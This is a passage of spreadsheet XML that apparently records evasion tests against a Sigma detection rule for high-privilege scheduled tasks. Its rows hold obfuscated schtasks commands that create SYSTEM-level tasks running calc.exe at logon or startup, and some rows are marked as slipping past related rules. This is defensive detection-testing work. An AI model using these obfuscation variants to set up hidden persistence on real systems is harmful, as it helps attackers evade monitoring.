      <c r="J1511" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1511" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1512" ht="15.75" customHeight="1" s="42">
      <c r="A1512" s="43" t="n"/>
      <c r="B1512" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1512" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1512" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1512" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create -"TN" "TestTask" /tR "calc.exe" -"RU" SYSTEM /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1512" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1512" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1512" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1512" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1512" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1512" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1513" ht="15.75" customHeight="1" s="42">
      <c r="A1513" s="43" t="n"/>
      <c r="B1513" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1513" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1513" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1513" s="44" t="inlineStr">
        <is>
          <t>schtasks -"Create" -"TN" "TestTask" /"TR" "calc.exe" -"RU" SYSTEM /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1513" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1513" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1513" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1513" s="44" t="n"/>
      <c r="J1513" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1513" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1514" ht="15.75" customHeight="1" s="42">
      <c r="A1514" s="43" t="n"/>
      <c r="B1514" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1514" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1514" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1514" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /"TN" "TestTask" /TR "calc.exe" /RU SYSTEM /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1514" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1514" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1514" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1514" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges (89ca78fd-b37c-4310-b3d3-81a023f83936); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1514" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1514" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1515" ht="15.75" customHeight="1" s="42">
      <c r="A1515" s="43" t="n"/>
      <c r="B1515" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1515" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1515" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1515" s="44" t="inlineStr">
        <is>
          <t>schtasks -"Create" /TN "TestTask" -"TR" "calc.exe" /RU SYSTEM /"SC" ONLOGON</t>
        </is>
      </c>
      <c r="F1515" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1515" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1515" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1515" s="44" t="n"/>
      <c r="J1515" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1515" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1516" ht="15.75" customHeight="1" s="42">
      <c r="A1516" s="43" t="n"/>
      <c r="B1516" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1516" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1516" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1516" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /"TN" "TestTask" /"TR" "calc.exe" /ru SYSTEM /"SC" ONLOGON</t>
        </is>
      </c>
      <c r="F1516" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1516" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1516" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1516" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges (89ca78fd-b37c-4310-b3d3-81a023f83936); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1516" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1516" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1517" ht="15.75" customHeight="1" s="42">
      <c r="A1517" s="43" t="n"/>
      <c r="B1517" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1517" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1517" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1517" s="44" t="inlineStr">
        <is>
          <t>schtasks /creAte /TN "TestTask" /"TR" "calc.exe" /ru SYSTEM /sC ONLOGON</t>
        </is>
      </c>
      <c r="F1517" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1517" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1517" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1517" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges (89ca78fd-b37c-4310-b3d3-81a023f83936); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1517" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1517" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1518" ht="15.75" customHeight="1" s="42">
      <c r="A1518" s="43" t="n"/>
      <c r="B1518" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1518" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1518" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1518" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /"TN" "TestTask" /TR "calc.exe" /ru SYSTEM /sC ONLOGON</t>
        </is>
      </c>
      <c r="F1518" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1518" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1518" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1518" s="44" t="inlineStr">
        <is>
          <t>Schtasks Creation Or Modification With SYSTEM Privileges (89ca78fd-b37c-4310-b3d3-81a023f83936); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1518" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1518" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1519" ht="15.75" customHeight="1" s="42">
      <c r="A1519" s="43" t="n"/>
      <c r="B1519" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1519" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1519" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1519" s="44" t="inlineStr">
        <is>
          <t>schtasks -"Create" /tn "TestTask" /TR "calc.exe" /RU SYSTEM /sC ONLOGON</t>
        </is>
      </c>
      <c r="F1519" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1519" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1519" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1519" s="44" t="n"/>
      <c r="J1519" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1519" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1520" ht="15.75" customHeight="1" s="42">
      <c r="A1520" s="43" t="n"/>
      <c r="B1520" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1520" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1520" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1520" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "TestTask" /TR "calc.exe" /SC "ONLOGON" /RU "SYSTEM"</t>
        </is>
      </c>
      <c r="F1520" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1520" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1520" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1520" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1520" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1520" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1521" ht="15.75" customHeight="1" s="42">
      <c r="A1521" s="43" t="n"/>
      <c r="B1521" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1521" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1521" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1521" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "TestTask" /"TR" "calc.exe" -"SC" "ONLOGON" /RU "SYSTEM"</t>
        </is>
      </c>
      <c r="F1521" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1521" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1521" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1521" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1521" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1521" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1522" ht="15.75" customHeight="1" s="42">
      <c r="A1522" s="43" t="n"/>
      <c r="B1522" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1522" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1522" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1522" s="44" t="inlineStr">
        <is>
          <t>schtasks -"Create" /TN "TestTask" /"TR" "calc.exe" /"SC" "ONLOGON" /RU "SYSTEM"</t>
        </is>
      </c>
      <c r="F1522" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1522" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1522" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1522" s="44" t="n"/>
      <c r="J1522" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1522" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1523" ht="15.75" customHeight="1" s="42">
      <c r="A1523" s="43" t="n"/>
      <c r="B1523" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1523" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1523" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1523" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /Tn "TestTask" /Tr "calc.exe" -"SC" "ONLOGON" /RU "SYSTEM"</t>
        </is>
      </c>
      <c r="F1523" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1523" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1523" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1523" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1523" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1523" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1524" ht="15.75" customHeight="1" s="42">
      <c r="A1524" s="43" t="n"/>
      <c r="B1524" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1524" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1524" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1524" s="44" t="inlineStr">
        <is>
          <t>schtasks -"Create" /TN "TestTask" /TR "calc.exe" /Sc "ONLOGON" -"RU" "SYSTEM"</t>
        </is>
      </c>
      <c r="F1524" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1524" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1524" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1524" s="43" t="n"/>
      <c r="J1524" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1524" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1525" ht="15.75" customHeight="1" s="42">
      <c r="A1525" s="43" t="n"/>
      <c r="B1525" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1525" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1525" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1525" s="44" t="inlineStr">
        <is>
          <t>schtasks /"Create" /TN "TestTask" /TR "calc.exe" -"SC" "ONLOGON" /RU "SYSTEM"</t>
        </is>
      </c>
      <c r="F1525" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1525" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1525" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1525" s="44" t="n"/>
      <c r="J1525" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1525" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1526" ht="15.75" customHeight="1" s="42">
      <c r="A1526" s="43" t="n"/>
      <c r="B1526" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1526" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1526" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1526" s="44" t="inlineStr">
        <is>
          <t>schtasks /CReate /TN "TestTask" -"TR" "calc.exe" /Sc "ONLOGON" /RU "SYSTEM"</t>
        </is>
      </c>
      <c r="F1526" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1526" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1526" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1526" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1526" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1526" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1527" ht="15.75" customHeight="1" s="42">
      <c r="A1527" s="43" t="n"/>
      <c r="B1527" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1527" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1527" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1527" s="44" t="inlineStr">
        <is>
          <t>schtasks -"Create" /tN "TestTask" /tR "calc.exe" /SC "ONLOGON" /rU "SYSTEM"</t>
        </is>
      </c>
      <c r="F1527" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1527" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1527" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1527" s="43" t="n"/>
      <c r="J1527" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1527" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1528" ht="15.75" customHeight="1" s="42">
      <c r="A1528" s="43" t="n"/>
      <c r="B1528" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1528" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1528" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1528" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "TestTask" /TR "calc.exe" /SC "ONLOGON" -"RU" "SYSTEM"</t>
        </is>
      </c>
      <c r="F1528" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1528" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1528" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1528" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1528" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1528" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1529" ht="15.75" customHeight="1" s="42">
      <c r="A1529" s="43" t="n"/>
      <c r="B1529" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1529" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1529" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1529" s="44" t="inlineStr">
        <is>
          <t>schtasks /cReAtE /tN "TestTask" /tR "calc.exe" /sc "ONLOGON" /RU "SYSTEM"</t>
        </is>
      </c>
      <c r="F1529" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1529" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1529" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1529" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1529" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1529" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1530" ht="15.75" customHeight="1" s="42">
      <c r="A1530" s="43" t="n"/>
      <c r="B1530" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1530" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1530" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1530" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /"TN" "TestTask" /TR "calc.exe" /sc "ONLOGON" -"RU" "SYSTEM"</t>
        </is>
      </c>
      <c r="F1530" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1530" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1530" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1530" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1530" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1530" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1531" ht="15.75" customHeight="1" s="42">
      <c r="A1531" s="43" t="n"/>
      <c r="B1531" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1531" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1531" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1531" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "TestTask" /TR "calc.exe" /SC\tONSTART\t/RU\tSYSTEM</t>
        </is>
      </c>
      <c r="F1531" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1531" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1531" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1531" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1531" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1531" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1532" ht="15.75" customHeight="1" s="42">
      <c r="A1532" s="43" t="n"/>
      <c r="B1532" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1532" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1532" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1532" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /tn "TestTask" /TR "calc.exe" -"SC\tONSTART\t/RU\tSYSTEM"</t>
        </is>
      </c>
      <c r="F1532" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1532" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1532" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1532" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1532" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1532" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1533" ht="15.75" customHeight="1" s="42">
      <c r="A1533" s="43" t="n"/>
      <c r="B1533" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1533" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1533" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1533" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /"TN" "TestTask" /"TR" "calc.exe" /sC\TonStArT\T/Ru\TSyStem</t>
        </is>
      </c>
      <c r="F1533" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1533" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1533" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1533" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1533" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1533" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1534" ht="15.75" customHeight="1" s="42">
      <c r="A1534" s="43" t="n"/>
      <c r="B1534" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1534" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1534" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1534" s="44" t="inlineStr">
        <is>
          <t>schtasks /CrEatE /TN "TestTask" -"TR" "calc.exe" /SC\TonsTart\T/RU\tsYsteM</t>
        </is>
      </c>
      <c r="F1534" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1534" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1534" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1534" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1534" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1534" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1535" ht="15.75" customHeight="1" s="42">
      <c r="A1535" s="43" t="n"/>
      <c r="B1535" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1535" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1535" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1535" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create -"TN" "TestTask" /"TR" "calc.exe" -"SC\tONSTART\t/RU\tSYSTEM"</t>
        </is>
      </c>
      <c r="F1535" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1535" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1535" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1535" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1535" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1535" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1536" ht="15.75" customHeight="1" s="42">
      <c r="A1536" s="43" t="n"/>
      <c r="B1536" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1536" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
      </c>
      <c r="D1536" s="44" t="inlineStr">
        <is>
          <t>7a02e22e-b885-4404-b38b-1ddc7e65258a</t>
        </is>
      </c>
      <c r="E1536" s="44" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "TestTask" /tR "calc.exe" /Sc\TonstArT\T/RU\tsySteM</t>
        </is>
      </c>
      <c r="F1536" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1536" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1536" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1536" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1536" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1536" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1537" ht="15.75" customHeight="1" s="42">
      <c r="A1537" s="43" t="n"/>
      <c r="B1537" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type_system</t>
        </is>
      </c>
      <c r="C1537" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges</t>
        </is>
